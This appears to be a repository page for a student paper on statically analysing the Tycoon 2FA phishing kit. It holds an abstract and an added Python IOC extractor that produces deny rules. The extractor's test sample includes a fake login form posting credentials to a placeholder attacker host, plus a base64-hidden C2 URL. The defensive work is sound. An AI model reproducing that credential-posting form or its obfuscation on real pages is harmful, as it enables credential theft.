Abstract
It's gotten much easier to be a cybercriminal. We're seeing a boom in "Phishing-as-a-Service" (PaaS) platforms, which sell advanced phishing attacks as a ready-to-use product. This means almost anyone can now get the tools to launch sophisticated attacks, even if they don't have a lot of technical skill.
This research dives into one of the most prominent threats, the Tycoon 2FA phishing kit. This kit is dangerous because it's designed to bypass Multi-Factor Authentication (MFA) using what is known as an Adversary-in-the-Middle (AiTM) attack.
This paper covers how I built and tested a set of Python-based tools to perform "static analysis" on phishing kits like this one. The process involved writing a custom analysis script, encountering and resolving several environment and setup problems [9], and running the tool against a known-benign file to establish a baseline [9]. The research wrapped up with a successful proof-of-concept simulation. This test showed a complete, end-to-end workflow: from creating a fake threat and automatically gathering intelligence on it, to using that intel to automatically block the threat in a simulated Zero Trust security system.
These findings provide a validated method for pulling out actionable threat data (Indicators of Compromise, or IOCs) and set the stage for future work in building strong, automated defenses against AiTM phishing campaigns.
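The workflow the abstract describes (static analysis of a kit file, baselining against a benign file, and turning the remaining IOCs into block rules) as an added example; this is not the paper's tool and not Tycoon 2FA code. The kit and benign samples, the `.invalid` hostnames and the rule format are all constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed samples (not code from Tycoon 2FA or from the paper): a benign page
# used as the baseline, and a lookalike login page that posts credentials to an
# operator-controlled host, once in clear text and once as a base64 string.
EXFIL_HOST = "login-m365-verify.invalid"  # placeholder, not a real IOC
C2_URL_B64 = base64.b64encode(b"https://c2-relay.invalid/token").decode()
BENIGN_SAMPLE = '<link href="https://fonts.example-cdn.test/css" rel="stylesheet">'
KIT_SAMPLE = (
    '<link href="https://fonts.example-cdn.test/css" rel="stylesheet">\n'
    f'<form action="https://{EXFIL_HOST}/post.php" method="post"></form>\n'
    f'<script>var c = atob("{C2_URL_B64}");</script>'
)

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?:/[^\s\"'<>)]*)?")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long base64-looking runs


def extract_iocs(source: str) -> dict:
    """Static pass over kit source: collect URLs in the clear, then decode
    base64-looking strings and scan the decoded text as well."""
    urls = set(URL_RE.findall(source))
    for blob in B64_RE.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text once decoded
        urls.update(URL_RE.findall(decoded))
    domains = {urlparse(u).hostname for u in urls if urlparse(u).hostname}
    return {"urls": urls, "domains": domains}


def actionable_domains(kit: dict, baseline: dict) -> set:
    """Drop anything the benign baseline also references (shared CDNs etc.)."""
    return kit["domains"] - baseline["domains"]


def deny_rules(domains: set) -> list:
    """Turn the remaining IOCs into rules for a simulated Zero Trust policy."""
    return [{"action": "deny", "match": "domain", "value": d} for d in sorted(domains)]


if __name__ == "__main__":
    kit, base = extract_iocs(KIT_SAMPLE), extract_iocs(BENIGN_SAMPLE)
    for rule in deny_rules(actionable_domains(kit, base)):
        print(rule)
```

The baseline step is what keeps the shared CDN host out of the deny list; without it the policy would block legitimate infrastructure the kit merely reuses.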
Faculty Advisor/Mentor
Shobha Vatsa
Document Type
Paper
Disciplines
Cybersecurity
DOI
10.25776/a716-c387
Publication Date
11-14-2025
Deconstructing Tycoon 2FA: A Static Analysis Approach to Threat Intelligence and Automated Defense